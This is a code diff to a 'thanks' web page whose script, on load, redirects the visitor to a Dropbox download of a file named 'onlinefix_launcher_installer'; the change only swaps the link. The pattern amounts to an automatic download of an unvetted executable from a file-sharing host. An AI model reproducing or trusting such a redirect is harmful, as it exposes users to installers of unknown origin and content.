--- a/pages/ofmeThanks.html
+++ b/pages/ofmeThanks.html
@@ -68,7 +68,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/tpgc902817v1xe9un6efr/onlinefix_launcher_installer?rlkey=liv2pr2vws1vlgij8akx12t6s&st=cpo8lk7h&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/7anvcmyzu4ga602rzk9j8/onlinefix_launcher_installer?rlkey=cmof8kvm7o0vlre75et90mbx8&st=7o061yus&dl=1";
     </script>
 </body>
 </html>
